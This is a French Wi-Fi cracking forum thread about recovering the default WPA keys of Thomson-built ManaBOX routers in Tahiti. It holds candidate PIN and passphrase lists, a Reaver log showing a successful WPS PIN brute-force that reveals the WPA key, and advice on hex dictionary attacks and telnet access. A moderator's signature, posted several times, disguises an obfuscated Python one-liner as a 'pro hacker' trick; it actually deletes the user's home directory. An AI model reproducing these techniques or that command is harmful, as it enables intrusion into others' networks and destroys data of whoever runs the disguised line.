Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 04-04-2013 23:59:31

GODofLORD
Membre
Inscription : 02-04-2013
Messages : 21

Possible faille sur routeur Thomson

Bonjour ,

Je suis nouveau et cela va faire plus d'une semaine (parfois a faire des nuits blanche) que je suis dans le bain sur le crackage Wifi. Le Wep c'était du gateau ^^ mais par contre le WPA oula...j'essaye de retrouver mon code d'usine par défaut qui est AEE19059C2 j'ai tenter de générer des dicos Hexa sur 10 caractères avec toute sorte de programmes (bash perl crunch...) et script....mais j'ai le temps de mourire 2 fois lol je me suis orienter vers autre chose et la je suis tomber sur l'article de Kevin Devine, quel révélation ! Ainsi plusieurs programme adapter ont vu le jour pour cracker différente BOX.

Je suis de Tahiti , enfin ici nous possédant la 1ère dite "BOX" ici a Tahiti : la ManaBOX sortit il y a un peu plus de 2 ans je crois ! C'est également un routeur Thomson modèle TG797n v2
Je comprend que cette algorithme est utiliser sur a peu près tout les routeur Thomson .

N'étant pas du tout un as de la programmation ma demande est simple, comment adapter le code a nos cher ManaBOX ou bien si quelqu'un peut-il le faire j'en serai très reconnaissant

Je peu fournir toute les information nécessaire sur ma BOX si oui (SSID, numéro de série, clé WPA...etc)

Merci

Dernière modification par GODofLORD (05-04-2013 00:02:47)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-04-2013 05:55:06

GODofLORD
Membre
Inscription : 02-04-2013
Messages : 21

Re : Possible faille sur routeur Thomson

Personne ne veu bien m'aider ?

Voici une photo de ma BOX

ManaBOX

Dernière modification par GODofLORD (05-04-2013 08:21:12)

Hors Ligne

#3 05-04-2013 17:45:27

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Possible faille sur routeur Thomson

Il est inutile de faire un up quand tu n'as pas eu de réponses entre 1h et 7h du matin (heure de France métropolitaine, l'essentiel de nos visiteurs et membres sont en France métropolitaine, en Europe ou au Maghreb). La nuit le forum dort lui aussi.

Hors Ligne

#4 05-04-2013 17:53:58

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Possible faille sur routeur Thomson

Ceci est un forum, pas un chat ou un IRC; les gens passent et te réponde quand ils veulent/peuvent  wink
Ne te réponds pas à toi même; c'est très mal vu; et utilise l'option "modifier" wink

edit - @ M1ck3y :
  Tu as été plus rapide sur ce coup, ce n'est que partie remise old boy (musique type le bon la brute el truand)

Hors Ligne

#5 05-04-2013 21:05:12

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : Possible faille sur routeur Thomson

File nous tes adresses MAC et on pourra te dire si ton pass par défaut correspond à quelque chose.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#6 06-04-2013 06:44:25

GODofLORD
Membre
Inscription : 02-04-2013
Messages : 21

Re : Possible faille sur routeur Thomson

Voila la page de configuration par défaut du wifi du routeur avec sont adresses Mac.

Sanstitre-1.png

Dernière modification par GODofLORD (06-04-2013 06:47:07)

Hors Ligne

#7 06-04-2013 16:52:49

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : Possible faille sur routeur Thomson

L'algorithme de génération des pass oar défaut ne donne rien, pas de chance !


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#8 06-04-2013 18:46:30

GODofLORD
Membre
Inscription : 02-04-2013
Messages : 21

Re : Possible faille sur routeur Thomson

Tu pourrai m'expliquer comment ta modifier / quel lignes tu as changer pour intégrer toute les donnée ci dessus dans l'algorithme ?

Hors Ligne

#9 07-04-2013 17:36:26

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Possible faille sur routeur Thomson

J'ai essayé vite fait:

-bbk.py (bbkeys avec toutes les années en python), rien

-Colombiana (l'excellent tool de spawn) avec la bdd suivante (passphrase et pincode WPS confrontés aux éléments connus):

CP1223KH095;AEE19059C2
Cp1223kh095;AEE19059C2
CP1223KH095E9;AEE19059C2
Cp1223kh095e9;AE19059C2
00:26:44:FC:C9:37;AEE19059C2
002644FCC937;AEE19059C2
00:26:44:fc:c9:37;AEE19059C2
002644fcc937;AEE19059C2
ManaBOXFCC937;AEE19059C2
BOXFCC937;AEE19059C2
ManaFCC937;AEE19059C2
FCC937;AEE19059C2
manaboxfcc937;AEE19059C2
boxfcc937;AEE19059C2
manafcc937;AEE19059C2
fcc937;AEE19059C2
CP1223KH095;aee19059c2
Cp1223kh095;aee19059c2
CP1223KH095E9;aee19059c2
Cp1223kh095e9;aee19059c2
00:26:44:FC:C9:37;aee19059c2
002644FCC937;aee19059c2
00:26:44:fc:c9:37;aee19059c2
002644fcc937;aee19059c2
ManaBOXFCC937;aee19059c2
BOXFCC937;aee19059c2
ManaFCC937;aee19059c2
FCC937;aee19059c2
manaboxfcc937;aee19059c2
boxfcc937;aee19059c2
manafcc937;aee19059c2
fcc937;aee19059c2
AEE19059C2;3129-0265
aee19059c2;3129-0265
AEE19059C2;31290265
aee19059c2;31290265
CP1223KH095;3129-0265
Cp1223kh095;3129-0265
CP1223KH095E9;3129-0265
Cp1223kh095e9;3129-0265
00:26:44:FC:C9:37;3129-0265
002644FCC937;3129-0265
00:26:44:fc:c9:37;3129-0265
002644fcc937;3129-0265
ManaBOXFCC937;3129-0265
BOXFCC937;3129-0265
ManaFCC937;3129-0265
FCC937;3129-0265
manaboxfcc937;3129-0265
boxfcc937;3129-0265
manafcc937;3129-0265
fcc937;3129-0265
CP1223KH095;31290265
Cp1223kh095;31290265
CP1223KH095E9;31290265
Cp1223kh095e9;31290265
00:26:44:FC:C9:37;31290265
002644FCC937;31290265
00:26:44:fc:c9:37;31290265
002644fcc937;31290265
ManaBOXFCC937;31290265
BOXFCC937;31290265
ManaFCC937;31290265
FCC937;31290265
manaboxfcc937;31290265
boxfcc937;31290265
manafcc937;31290265
fcc937;31290265

là encore malheureusement

test-colombiana-manabox.png

Mais il doit y avoir un algo là derrière, c'est sur.

Au fait, ce n'est pas un pincode WPS que je vois sur ta photo? Si l'algo de génération de la passphrase est difficile à trouver, tu peux toujours tenter de trouver une faille coté WPS...

Hors Ligne

#10 07-04-2013 20:43:51

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : Possible faille sur routeur Thomson

[hs] puisqu'on en parle, je vais la refaire de manière professionnelle pendant mon stage de 6 mois qui commence dans une semaine, ça va envoyer du lourd en parrallèle (: [/hs]

Il n'y a qu'à espérer que dans l'algo de génération il n'y a pas de facteur aléatoire ( par exemple /dev/random de la machine qu calcule les mots de passe )


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#11 08-04-2013 10:55:17

GODofLORD
Membre
Inscription : 02-04-2013
Messages : 21

Re : Possible faille sur routeur Thomson

Humm merci, je comprend donc que la trouvaille sur l'ago des Thomson de Devine est bien obsolète. Pour le WPS je ne sais pas si s'en ai un (chose que j'ai jamais utiliser) mais on tout les cas c'est bien marquer en tout petit en dessous des flèches "Wifi Protected 3119-0265" et sur coté de la box se trouve également un bouton avec ce symbole à deux flèches. Je vais testé !

Et si je rapporte un peu plus de donnée (N° Série SSID Clé Wifi par défaut) d'autre BOX. Pensez vous que sa peu aider ?

Hors Ligne

#12 10-04-2013 14:22:52

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Possible faille sur routeur Thomson

Salut à tous !

Tout d'abord je voudrais vous féliciter pour le formidable travail que vous faites, notamment Spawn avec Colombiana.

Malheureusement je n'arrive pas à l'utiliser, mais je dispose de données qui pourraient nous être utiles wink.

L'un d'entre vous (Spawn ou M1ckey) pourrait-il les essayer dans Colombiana et nous dire ce que ca donne ?

Voici ma liste, c'est une série des 6 derniers caractères BSSID associés à leur PIN.

938028;15061591
941A8D;79489515
948BE4;37017422
9388E8;90467912
96C99F;12456789
A4CAFF;71095837
936D45;90427145

Merci de votre aide, A vous de jouer wink

Hors Ligne

#13 10-04-2013 17:23:48

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Possible faille sur routeur Thomson

Ça c'est du gros piratage de topic tongue
Ouvre un thème à part s'il te plait en donnant plus de détails, quel routeur, quel modèle, etc... bref, ouvre un thème d'investigation comme à fait GODofLORD.
Spawn ou M1ck3y ne sont pas là pour faire les choses à ta place.
En plus il y a un topic sur colombiana ou "les joies de l'attaque recursive" , c'est là que ça se passe, pas dans ce topic intitulé  " Possible faille sur routeur Thomson "

How to execute a python script

PS: Spawn a fait le tool, à toi de faire un effort wink

Hors Ligne

#14 12-04-2013 05:34:14

GODofLORD
Membre
Inscription : 02-04-2013
Messages : 21

Re : Possible faille sur routeur Thomson

Alors voila aprés plus de 2 jours de crack WPS sur reaver 1.4 il a finalement trouver le Pin et le code WPA mais je me demande pourquoi le code WPA est-il aussi long :"17A186195C1D40C31450BDF38B4024E4374700E34BEBD0961EECBD37164AC6BA" au lieu de AEE19059C2 mais aussi je tiens a préciser que cela fonctionne tout de même, j'arrive a me connecter avec smile

[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 31290241
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 91.22% complete @ 2013-04-12 02:56:40 (65 seconds/pin)
[+] Trying pin 31290258
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 31290265
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 206108 seconds
[+] WPS PIN: '31290265'
[+] WPA PSK: '17A186195C1D40C31450BDF38B4024E4374700E34BEBD0961EECBD37164AC6BA'
[+] AP SSID: 'ManaBOXFCC937'
[email protected]:~# 

Dernière modification par GODofLORD (12-04-2013 05:35:30)

Hors Ligne

#15 12-04-2013 10:16:15

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : Possible faille sur routeur Thomson

512 bits... on dirait un sha256.
Je verrais ça plus tard.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#16 16-04-2013 18:48:24

GODofLORD
Membre
Inscription : 02-04-2013
Messages : 21

Re : Possible faille sur routeur Thomson

Ya espoir de quelque chose donc avec ce que j'ai donner ?

Hors Ligne

#17 10-06-2013 01:56:00

GODofLORD
Membre
Inscription : 02-04-2013
Messages : 21

Re : Possible faille sur routeur Thomson

Update !

J'ai découvert quelque chose mais je ne sais pas si sa peu aider, alors tout en ayant airodump lancer pour scanner les wifi, j'ai aussi voulu réinitialiser ma BOX (la ManaBOX) et pendant un cours instant le essid de ma ManaBOX été ThomsonF9CAD pour enfin devenir ManaBOXFCC937 aprés la réinitialisation totale de la BOX. Donc voilà qu'on penser vous ?

Dernière modification par GODofLORD (10-06-2013 01:56:54)

Hors Ligne

#18 17-08-2013 09:15:53

lokoum
N00b
Inscription : 17-08-2013
Messages : 1

Re : Possible faille sur routeur Thomson

Salut à tous !
Etant de Tahiti aussi, je me suis interressé au WPA2 de la manabox (quoi soit dit en passant est une grosse daub' big_smile )
Le problème du WPS c'est que maintenant au bout d'un certain nombre de requete la box se bloque un x temps....
Il faut remarquer que bien que la manabox soit en WPA2 par défaut il ya une chose qui peut être avantageux -> les mot de passe par défaut sont de l'héxa soit: 0123456789ABCDEF
le problème c'est que les mdp varient entre 8 et 10 caracteres selon les box et en créant un dico qui contient rien que toutes les combinaisons possible pour 8 caracteres fait environ 36G donc il faudrait plusieurs jours pour arriver à trouver le mdp si celui-ci est de 8 caracteres......

Hors Ligne

#19 15-01-2015 00:42:49

MDiegao
N00b
Inscription : 10-03-2014
Messages : 1

Re : Possible faille sur routeur Thomson

Salut ,(Iaorana)

J'ai essayé avec reaver mais effectivement la box se bloque au bout d'un certain temps... Echec pour moi
En essayant autrement, j'ai obtenu le handshake mais trop long à découvrir le passphrase avec aircrack-ng 1.2beta, sur mon ptit portable i5. (environ 1500 k/s)
Comme l'avait décrit précédemment GODofLORD, il faudait un dico de 10 caractères en hexa: 0123456789ABCDEF, avec un agencement et permutation plus efficace...
Avez-vous du nouveau sur ce dico? Serait-il possible de l'obtenir...?
J'ai pas bien saisi permute.sh...

Hors Ligne

#20 15-01-2015 20:16:50

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 706

Re : Possible faille sur routeur Thomson

Bonsoir,

Tu as sur le forum des tonnes de tutos et aussi des dicos fais par différent membre.

Un dico de 10 caractères en mélange, essaye de t'imaginer la taille que ça ferait.. Tu trouvera aussi des infos là dessus.

Le forum est relativememt complet sur le sujet et tu y trouvera ton bonheur.

Hors Ligne

#21 15-01-2016 10:19:15

GODofLORD
Membre
Inscription : 02-04-2013
Messages : 21

Re : Possible faille sur routeur Thomson

Me revoila sur mon bon vieux post xD ceci dit Reaver reste le meilleur moyen de cracker cette box !

Hors Ligne

#22 15-01-2016 13:53:04

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Possible faille sur routeur Thomson

A mon avis (99,9%) on a un algorithme commun avec les TD5130 de TCNAP (marroc), les TG 784n v3 (espagne, italie, portugal) et un autre TG que j'avais vu principalement en Grèce
Les serial on tous cette forme
CPYYMMxxxxx

code de production anné (year) + semaine (week)  ( ex : 1222 = 22ème semaine de 2012X sont des lettres majuscules et s'emploient pour déterminer l'unité produite (code personnel de la box en quelques sorte)

Un sériai très légèrement différent du vieux matos thomson speedtouch ( CPYYWW PP XXX (CC) )

ce qui serait intéressant c'est que tu essaye de rnetrer par telnet pour chopper les variables d’environnement pour qu'on y jette un coup d'oeil.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
1 213 06-12-2016 21:47:25 par spawn
4 224 04-12-2016 16:20:59 par pwerrick
9 1724 20-11-2016 03:45:46 par richie
Routeur avec antenne amovible par le flibustier
0 256 07-11-2016 19:12:24 par le flibustier
11 454 05-09-2016 15:07:25 par MiscL

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.046 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]